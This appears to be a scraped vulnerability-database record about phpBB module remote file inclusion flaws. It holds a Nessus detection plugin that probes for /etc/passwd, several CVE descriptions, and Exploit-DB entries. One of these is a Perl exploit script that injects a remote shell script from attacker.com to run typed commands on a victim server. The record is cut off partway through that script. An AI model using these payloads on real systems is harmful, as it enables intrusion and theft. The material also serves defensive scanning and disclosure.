"CVE-2006-2245", "CVE-2007-5100", "CVE-2006-5306"], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "The remote host contains a third-party module for phpBB. \n\nThe version of at least one such component or module installed on the remote host fails to sanitize input to the 'phpbb_root_path' parameter before using it to include PHP code. Provided PHP's 'register_globals' setting is enabled, an unauthenticated attacker may be able to exploit these flaws to view arbitrary files on the remote host or to execute arbitrary PHP code, possibly taken from third-party hosts.", "edition": 5, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "944bafa91d9432dac58c508a084f784a0f1657723d5389075de9f35a6932d2a4", "hashmap": [{"hash": "cd1acb6332b705efcfb274e39bdce0d5", "key": "title"}, {"hash": "fed7aede4a5f01a9fc080184a2dd8da8", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "eb7c1eabb2baa803f2635d2ba4792d3f", "key": "pluginID"}, {"hash": "54763aeea4128585b660ca7c17280d48", "key": "modified"}, {"hash": "69db04a1c80dd4a176e4f3d53561e805", "key": "cvelist"}, {"hash": "482eb5449b320af2330c92508b5a67b7", "key": "sourceData"}, {"hash": "b8ec7988b9627a83f1d82122e582413e", "key": "description"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "8b5dc20b319b47100bd63d45b155e50c", "key": "published"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}, {"hash": "65920404be9df979f281f296ff035289", "key": "cpe"}, {"hash": "9acce4448de96d820472fbc896512e35", "key": "href"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=21323", "id": "PHPBB_AUCTION_PHPBB_ROOT_PATH_FILE_INCLUDE.NASL", "lastseen": "2018-05-17T12:45:20", "modified": "2018-05-16T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "21323", "published": "2006-05-04T00:00:00", "references": ["http://www.securityfocus.com/archive/1/479997/30/0/threaded", "http://www.nessus.org/u?9640ab6a", "http://www.phpbb.com/phpBB/viewtopic.php?p=2504370&highlight=#2504370", "http://www.nessus.org/u?37fd2995", "http://seclists.org/bugtraq/2006/Oct/209", "http://www.securityfocus.com/archive/1/452012/30/0/threaded"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21323);\n script_version(\"1.38\");\n\n script_cve_id(\n \"CVE-2006-2245\",\n \"CVE-2006-5301\",\n \"CVE-2006-5306\",\n \"CVE-2006-5390\",\n \"CVE-2006-5418\",\n \"CVE-2006-7090\",\n \"CVE-2006-7100\",\n \"CVE-2006-7147\",\n \"CVE-2007-5009\",\n \"CVE-2007-5100\"\n );\n script_bugtraq_id(\n 17822, \n 20484, \n 20485, \n 20493, \n 20501, \n 20518, \n 20525, \n 20558, \n 20571, \n 21171, \n 25737, \n 25776\n );\n script_osvdb_id(\n 25263,\n 29711,\n 29712,\n 29713,\n 29714,\n 29734,\n 29751,\n 31029,\n 35449,\n 35450,\n 38265,\n 38723,\n 38724,\n 38725\n );\n script_xref(name:\"EDB-ID\", value:\"2483\");\n script_xref(name:\"EDB-ID\", value:\"2522\");\n script_xref(name:\"EDB-ID\", value:\"2525\");\n script_xref(name:\"EDB-ID\", value:\"2533\");\n script_xref(name:\"EDB-ID\", value:\"2538\");\n\n script_name(english:\"phpBB Multiple Module phpbb_root_path Parameter Remote File Inclusion\");\n script_summary(english:\"Tries to read a local file using phpBB modules\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is prone to\nremote file include attacks.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host contains a third-party module for phpBB. \n\nThe version of at least one such component or module installed on the\nremote host fails to sanitize input to the 'phpbb_root_path' parameter\nbefore using it to include PHP code. Provided PHP's\n'register_globals' setting is enabled, an unauthenticated attacker may\nbe able to exploit these flaws to view arbitrary files on the remote\nhost or to execute arbitrary PHP code, possibly taken from third-party\nhosts.\" );\n # http://web.archive.org/web/20070527141033/http://pridels.blogspot.com/2006/05/phpbb-auction-mod-remote-file.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9640ab6a\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/bugtraq/2006/Oct/209\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpbb.com/phpBB/viewtopic.php?p=2504370&highlight=#2504370\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/452012/30/0/threaded\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/479997/30/0/threaded\" );\n # https://web.archive.org/web/20160820141912/http://www.phpbb2.de/ftopic45218.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?37fd2995\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Disable PHP's 'register_globals' setting or contact the product's\nauthor to see if an upgrade exists.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2006/05/04\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2006/05/03\");\n script_cvs_date(\"Date: 2018/05/16 19:05:10\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:phpbb_group:phpbb-auction\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"phpbb_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/phpBB\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"data_protection.inc\");\n\nport = get_http_port(default:80);\nif (!can_host_php(port:port)) exit(0);\n\n\n# Vulnerable scripts.\n# - modules\nnmods = 0;\nmod = make_array();\n# - ACP User Registration\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Admin User Viewed Posts Tracker\nmod[nmods++] = \"/includes/functions_user_viewed_posts.php\";\n# - AI chat (included in PlusXL)\nmod[nmods++] = \"/mods/iai/includes/constants.php\";\n# - Import Tools - Members\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Insert User\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Journals System\nmod[nmods++] = \"/includes/journals_delete.php\";\nmod[nmods++] = \"/includes/journals_edit.php\";\nmod[nmods++] = \"/includes/journals_post.php\";\n# - phpBB auction\nmod[nmods++] = \"/auction/auction_common.php\";\n# - phpBB Search Engine Indexer\nmod[nmods++] = \"/includes/archive/archive_topic.php\";\n# - phpBB Security\nmod[nmods++] = \"/includes/phpbb_security.php\";\n# - phpBB2 Plus (not really a mod)\nmod[nmods++] = \"/language/lang_german/lang_main_album.php\";\nmod[nmods++] = \"/language/lang_german/lang_admin_album.php\";\nmod[nmods++] = \"/language/lang_english/lang_main_album.php\";\nmod[nmods++] = \"/language/lang_english/lang_admin_album.php\";\n# - PlusXL itself\nmod[nmods++] = \"/includes/functions.php\";\n# - SpamBlockerMod\nmod[nmods++] = \"/includes/antispam.php\";\n\n\ninfo = \"\";\ncontents = \"\";\n\n\n# Test an install.\ninstall = get_kb_item(string(\"www/\", port, \"/phpBB\"));\nif (isnull(install)) exit(0);\nmatches = eregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!isnull(matches)) {\n dir = matches[2];\n\n # Try to exploit the flaw to read a file.\n file = \"/etc/passwd%00\";\n for (i=0; i<nmods; i++)\n {\n r = http_send_recv3(method:\"GET\", \n item:string(\n dir, mod[i], \"?\",\n \"phpbb_root_path=\", file\n ), \n port:port\n );\n if (isnull(r)) exit(0);\n res = r[2];\n\n # There's a problem if...\n if (\n # there's an entry for root or...\n egrep(pattern:\"root:.*:0:[01]:\", string:res) ||\n # we get an error saying \"failed to open stream\".\n egrep(pattern:\"main\$/etc/passwd\\\\0.+ failed to open stream\", string:res) ||\n # we get an error claiming the file doesn't exist or...\n egrep(pattern:\"main\\(/etc/passwd\$.*: failed to open stream: No such file or directory\", string:res) ||\n # we get an error about open_basedir restriction.\n egrep(pattern:\"main.+ open_basedir restriction in effect. File\\(/etc/passwd\", string:res)\n )\n {\n info = info +\n \" \" + dir + mod[i] + '\\n';\n\n if (!contents && egrep(string:res, pattern:\"root:.*:0:[01]:\"))\n contents = res - strstr(res, \"<br\");\n\n if (!thorough_tests) break;\n }\n }\n}\n\nif (info)\n{\n if (contents)\n {\n contents = data_protection::redact_etc_passwd(output:contents);\n info = string(\n info,\n \"\\n\",\n \"And here are the contents of the file '/etc/passwd' that Nessus\\n\",\n \"was able to read from the remote host :\\n\",\n \"\\n\",\n contents\n );\n }\n report = string(\n \"The following scripts(s) are vulnerable :\\n\",\n \"\\n\",\n info\n );\n\n security_warning(port:port, extra:report);\n}\n", "title": "phpBB Multiple Module phpbb_root_path Parameter Remote File Inclusion", "type": "nessus", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 5, "lastseen": "2018-05-17T12:45:20"}], "edition": 10, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "65920404be9df979f281f296ff035289"}, {"key": "cvelist", "hash": "69db04a1c80dd4a176e4f3d53561e805"}, {"key": "cvss", "hash": "737e2591b537c46d1ca7ce6f0cea5cb9"}, {"key": "description", "hash": "82225a90448b406db9ebb27b5ec0f52a"}, {"key": "href", "hash": "9acce4448de96d820472fbc896512e35"}, {"key": "modified", "hash": "015cb78ce50d3bd4e2fbe18f25603329"}, {"key": "naslFamily", "hash": "07948b8ff59e8dda0b01012f70f00327"}, {"key": "pluginID", "hash": "eb7c1eabb2baa803f2635d2ba4792d3f"}, {"key": "published", "hash": "8b5dc20b319b47100bd63d45b155e50c"}, {"key": "references", "hash": "4d9c49a2a6a3144a40f9c20b01976545"}, {"key": "reporter", "hash": "9cf00d658b687f030ebe173a0528c567"}, {"key": "sourceData", "hash": "f850038f28a9086139708577a2889260"}, {"key": "title", "hash": "cd1acb6332b705efcfb274e39bdce0d5"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "4d0b2fa1846c395982aaceeb3ee649b789e38f6e03090533817670db2d3d0c62", "viewCount": 0, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-7147", "CVE-2006-5306", "CVE-2006-5301", "CVE-2006-7100", "CVE-2006-7090", "CVE-2006-5418", "CVE-2007-5009", "CVE-2006-2245", "CVE-2007-5100", "CVE-2006-5390"]}, {"type": "exploitdb", "idList": ["EDB-ID:2531", "EDB-ID:2522", "EDB-ID:2525", "EDB-ID:2533", "EDB-ID:1747", "EDB-ID:2549", "EDB-ID:4434", "EDB-ID:2551"]}, {"type": "osvdb", "idList": ["OSVDB:35450", "OSVDB:29713", "OSVDB:29712", "OSVDB:31029", "OSVDB:29714", "OSVDB:29711", "OSVDB:35449", "OSVDB:25263", "OSVDB:29751", "OSVDB:38725"]}, {"type": "canvas", "idList": ["PHPBBPLUS_INCLUDE"]}], "modified": "2019-01-16T20:06:36"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21323);\n script_version(\"1.40\");\n\n script_cve_id(\n \"CVE-2006-2245\",\n \"CVE-2006-5301\",\n \"CVE-2006-5306\",\n \"CVE-2006-5390\",\n \"CVE-2006-5418\",\n \"CVE-2006-7090\",\n \"CVE-2006-7100\",\n \"CVE-2006-7147\",\n \"CVE-2007-5009\",\n \"CVE-2007-5100\"\n );\n script_bugtraq_id(\n 17822, \n 20484, \n 20485, \n 20493, \n 20501, \n 20518, \n 20525, \n 20558, \n 20571, \n 21171, \n 25737, \n 25776\n );\n script_xref(name:\"EDB-ID\", value:\"2483\");\n script_xref(name:\"EDB-ID\", value:\"2522\");\n script_xref(name:\"EDB-ID\", value:\"2525\");\n script_xref(name:\"EDB-ID\", value:\"2533\");\n script_xref(name:\"EDB-ID\", value:\"2538\");\n\n script_name(english:\"phpBB Multiple Module phpbb_root_path Parameter Remote File Inclusion\");\n script_summary(english:\"Tries to read a local file using phpBB modules\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is prone to\nremote file include attacks.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host contains a third-party module for phpBB. \n\nThe version of at least one such component or module installed on the\nremote host fails to sanitize input to the 'phpbb_root_path' parameter\nbefore using it to include PHP code. Provided PHP's\n'register_globals' setting is enabled, an unauthenticated attacker may\nbe able to exploit these flaws to view arbitrary files on the remote\nhost or to execute arbitrary PHP code, possibly taken from third-party\nhosts.\" );\n # http://web.archive.org/web/20070527141033/http://pridels.blogspot.com/2006/05/phpbb-auction-mod-remote-file.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9640ab6a\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2006/Oct/209\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.phpbb.com/community/viewtopic.php?p=2504370&highlight=#2504370\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/452012/30/0/threaded\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/479997/30/0/threaded\" );\n # https://web.archive.org/web/20160820141912/http://www.phpbb2.de/ftopic45218.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?37fd2995\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Disable PHP's 'register_globals' setting or contact the product's\nauthor to see if an upgrade exists.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2006/05/04\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2006/05/03\");\n script_cvs_date(\"Date: 2018/11/15 20:50:18\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:phpbb_group:phpbb-auction\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"phpbb_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/phpBB\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"data_protection.inc\");\n\nport = get_http_port(default:80);\nif (!can_host_php(port:port)) exit(0);\n\n\n# Vulnerable scripts.\n# - modules\nnmods = 0;\nmod = make_array();\n# - ACP User Registration\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Admin User Viewed Posts Tracker\nmod[nmods++] = \"/includes/functions_user_viewed_posts.php\";\n# - AI chat (included in PlusXL)\nmod[nmods++] = \"/mods/iai/includes/constants.php\";\n# - Import Tools - Members\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Insert User\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Journals System\nmod[nmods++] = \"/includes/journals_delete.php\";\nmod[nmods++] = \"/includes/journals_edit.php\";\nmod[nmods++] = \"/includes/journals_post.php\";\n# - phpBB auction\nmod[nmods++] = \"/auction/auction_common.php\";\n# - phpBB Search Engine Indexer\nmod[nmods++] = \"/includes/archive/archive_topic.php\";\n# - phpBB Security\nmod[nmods++] = \"/includes/phpbb_security.php\";\n# - phpBB2 Plus (not really a mod)\nmod[nmods++] = \"/language/lang_german/lang_main_album.php\";\nmod[nmods++] = \"/language/lang_german/lang_admin_album.php\";\nmod[nmods++] = \"/language/lang_english/lang_main_album.php\";\nmod[nmods++] = \"/language/lang_english/lang_admin_album.php\";\n# - PlusXL itself\nmod[nmods++] = \"/includes/functions.php\";\n# - SpamBlockerMod\nmod[nmods++] = \"/includes/antispam.php\";\n\n\ninfo = \"\";\ncontents = \"\";\n\n\n# Test an install.\ninstall = get_kb_item(string(\"www/\", port, \"/phpBB\"));\nif (isnull(install)) exit(0);\nmatches = eregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!isnull(matches)) {\n dir = matches[2];\n\n # Try to exploit the flaw to read a file.\n file = \"/etc/passwd%00\";\n for (i=0; i<nmods; i++)\n {\n r = http_send_recv3(method:\"GET\", \n item:string(\n dir, mod[i], \"?\",\n \"phpbb_root_path=\", file\n ), \n port:port\n );\n if (isnull(r)) exit(0);\n res = r[2];\n\n # There's a problem if...\n if (\n # there's an entry for root or...\n egrep(pattern:\"root:.*:0:[01]:\", string:res) ||\n # we get an error saying \"failed to open stream\".\n egrep(pattern:\"main\$/etc/passwd\\\\0.+ failed to open stream\", string:res) ||\n # we get an error claiming the file doesn't exist or...\n egrep(pattern:\"main\\(/etc/passwd\$.*: failed to open stream: No such file or directory\", string:res) ||\n # we get an error about open_basedir restriction.\n egrep(pattern:\"main.+ open_basedir restriction in effect. File\\(/etc/passwd\", string:res)\n )\n {\n info = info +\n \" \" + dir + mod[i] + '\\n';\n\n if (!contents && egrep(string:res, pattern:\"root:.*:0:[01]:\"))\n contents = res - strstr(res, \"<br\");\n\n if (!thorough_tests) break;\n }\n }\n}\n\nif (info)\n{\n if (contents)\n {\n contents = data_protection::redact_etc_passwd(output:contents);\n info = string(\n info,\n \"\\n\",\n \"And here are the contents of the file '/etc/passwd' that Nessus\\n\",\n \"was able to read from the remote host :\\n\",\n \"\\n\",\n contents\n );\n }\n report = string(\n \"The following scripts(s) are vulnerable :\\n\",\n \"\\n\",\n info\n );\n\n security_warning(port:port, extra:report);\n}\n", "naslFamily": "CGI abuses", "pluginID": "21323", "cpe": ["cpe:/a:phpbb_group:phpbb-auction"]}

{"cve": [{"lastseen": "2017-10-11T11:06:55", "bulletinFamily": "NVD", "description": "PHP remote file inclusion vulnerability in includes/functions_mod_user.php in phpBB Import Tools Mod 0.1.4 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.", "modified": "2017-10-10T21:31:30", "published": "2007-03-07T15:19:00", "id": "CVE-2006-7147", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-7147", "title": "CVE-2006-7147", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-18T15:05:37", "bulletinFamily": "NVD", "description": "Multiple PHP remote file inclusion vulnerabilities in the Journals System module 1.0.2 (RC2) and earlier for phpBB allow remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter in (1) includes/journals_delete.php, (2) includes/journals_post.php, or (3) includes/journals_edit.php.", "modified": "2018-10-17T17:42:04", "published": "2006-10-17T11:07:00", "id": "CVE-2006-5306", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-5306", "title": "CVE-2006-5306", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-10-19T11:12:33", "bulletinFamily": "NVD", "description": "PHP remote file inclusion vulnerability in includes/antispam.php in the SpamBlockerMODv 1.0.2 and earlier module for phpBB allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.", "modified": "2017-10-18T21:29:32", "published": "2006-10-17T11:07:00", "id": "CVE-2006-5301", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-5301", "title": "CVE-2006-5301", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-18T15:05:39", "bulletinFamily": "NVD", "description": "PHP remote file inclusion vulnerability in includes/functions_mod_user.php in phpBB Insert User 0.1.2 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.", "modified": "2018-10-16T12:29:26", "published": "2007-03-03T16:19:00", "id": "CVE-2006-7100", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-7100", "title": "CVE-2006-7100", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-20T10:49:16", "bulletinFamily": "NVD", "description": "PHP remote file inclusion vulnerability in auction\\auction_common.php in Auction mod 1.3m for phpBB allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.", "modified": "2017-07-19T21:31:18", "published": "2006-05-09T06:02:00", "id": "CVE-2006-2245", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2245", "title": "CVE-2006-2245", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-29T11:21:46", "bulletinFamily": "NVD", "description": "PHP remote file inclusion vulnerability in phpbb_security.php in phpBB Security 1.0.1 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the php_root_path parameter.", "modified": "2017-07-28T21:29:49", "published": "2007-03-02T16:18:00", "id": "CVE-2006-7090", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-7090", "title": "CVE-2006-7090", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-18T15:05:38", "bulletinFamily": "NVD", "description": "PHP remote file inclusion vulnerability in archive/archive_topic.php in pbpbb archive for search engines (SearchIndexer) (aka phpBBSEI) for phpBB allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.", "modified": "2018-10-17T17:42:50", "published": "2006-10-20T10:07:00", "id": "CVE-2006-5418", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-5418", "title": "CVE-2006-5418", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-09-29T14:25:31", "bulletinFamily": "NVD", "description": "PHP remote file inclusion vulnerability in language/lang_german/lang_main_album.php in phpBB Plus 1.53, and 1.53a before 20070922, allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.", "modified": "2017-09-28T21:29:27", "published": "2007-09-20T17:17:00", "id": "CVE-2007-5009", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5009", "title": "CVE-2007-5009", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-03T09:33:15", "bulletinFamily": "NVD", "description": "Multiple PHP remote file inclusion vulnerabilities in phpBB Plus 1.53, and 1.53a before 20070922, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter to (1) language/lang_german/lang_admin_album.php, (2) language/lang_english/lang_main_album.php, and (3) language/lang_english/lang_admin_album.php, different vectors than CVE-2007-5009.", "modified": "2011-03-07T22:00:04", "published": "2007-09-26T18:17:00", "id": "CVE-2007-5100", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5100", "type": "cve", "title": "CVE-2007-5100", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-10-19T11:12:34", "bulletinFamily": "NVD", "description": "PHP remote file inclusion vulnerability in includes/functions_mod_user.php in the ACP User Registration (MMW) 1.00 module for phpBB allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.", "modified": "2017-10-18T21:29:34", "published": "2006-10-18T15:07:00", "id": "CVE-2006-5390", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-5390", "title": "CVE-2006-5390", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T16:29:05", "bulletinFamily": "exploit", "description": "phpBB Import Tools Mod <= 0.1.4 Remote File Include Vulnerability. CVE-2006-7147. Webapps exploit for php platform", "modified": "2006-10-12T00:00:00", "published": "2006-10-12T00:00:00", "id": "EDB-ID:2531", "href": "https://www.exploit-db.com/exploits/2531/", "type": "exploitdb", "title": "phpBB Import Tools Mod <= 0.1.4 - Remote File Include Vulnerability", "sourceData": "#\n# *\n# * Title: phpBB Import Tools Mod <= 0.1.4 (phpbb_root_path) Remote File Inclusion\n# * Author/Discovery: boecke\n# * Vulnerability Type: Remote File Inclusion\n# * Risk: High Risk\n# * Software Affected: phpBB Import Tools Mod <= 0.1.4\n# *\n# * Literally shouts to: str0ke and henrik\n# * Don't promote Google-ism!\n# *\n#\n\n[ Vulnerable Code: ]\ninclude_once($phpbb_root_path . 'includes/functions_validate.' . $phpEx);\ninclude_once($phpbb_root_path . 'includes/functions_post.' . $phpEx);\ninclude_once($phpbb_root_path . 'includes/bbcode.' . $phpEx);\n\n[ Fix: ]\nCorrectly sanitize these variables before their use or deny direct access to the script.\n\n[ Proof of Concept: ]\nhttp://localhost/phpBB2/includes/functions_mod_user.php?phpbb_root_path=\n\n# milw0rm.com [2006-10-12]\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2531/"}, {"lastseen": "2016-01-31T16:27:40", "bulletinFamily": "exploit", "description": "phpBB Journals System Mod 1.0.2 [RC2] Remote File Include Exploit. CVE-2006-5306. Webapps exploit for php platform", "modified": "2006-10-12T00:00:00", "published": "2006-10-12T00:00:00", "id": "EDB-ID:2522", "href": "https://www.exploit-db.com/exploits/2522/", "type": "exploitdb", "title": "phpBB Journals System Mod 1.0.2 RC2 - Remote File Include Exploit", "sourceData": "#!/usr/bin/perl\n \n################################################################################\n# #\n# Journals System ( Independant Journals System for phpBB ) #\n# #\n# Class: Remote File Include Vulnerability #\n# #\n# Patch: unavailable #\n# #\n# Date: 2006/10/12 #\n# #\n# Remote: Yes #\n# #\n# Type: high #\n# #\n# Site: http://projects.nbishop.name/phpbb/files/journals_system_1.0.2.zip #\n# #\n################################################################################\n\n\nuse IO::Socket;\nuse LWP::Simple;\n\n$cmdshell=\"http://attacker.com/cmd.txt\"; # <====== Change This Line With Your Personal Script\n\nprint \"\\n\";\nprint \"######################################################################\\n\";\nprint \"# #\\n\";\nprint \"# Journals System <= 1.0.2 [RC2] Remote File Include Vulnerability #\\n\";\nprint \"# Bug found By : Ashiyane Corporation #\\n\";\nprint \"# Email: Nima Salehi nima[at]ashiyane.ir #\\n\";\nprint \"# Web Site : www.Ashiyane.ir #\\n\";\nprint \"# #\\n\";\nprint \"######################################################################\\n\";\n\n\nif (@ARGV < 2)\n{\n print \"\\n Usage: Ashiyane.pl [host] [path] \";\n print \"\\n EX : Ashiyane.pl www.victim.com /phpbb/ \\n\\n\";\nexit;\n}\n\n\n$host=$ARGV[0];\n$path=$ARGV[1];\n\n#$vul=includes/journals_delete.php?phpbb_root_path=\"\n#$vul=includes/journals_post.php?phpbb_root_path=\"\n$vul=\"includes/journals_edit.php?phpbb_root_path=\"\n\nprint \"Type Your Commands ( uname -a )\\n\";\nprint \"For Exiit Type END\\n\";\n\nprint \"<Shell> \";$cmd = <STDIN>;\n\nwhile($cmd !~ \"END\") {\n $socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$host\", PeerPort=>\"80\") or die \"Could not connect to host.\\n\\n\";\n\n print $socket \"GET \".$path.$vul.$cmdshell.\"?cmd=\".$cmd.\"? HTTP/1.1\\r\\n\";\n print $socket \"Host: \".$host.\"\\r\\n\";\n print $socket \"Accept: */*\\r\\n\";\n print $socket 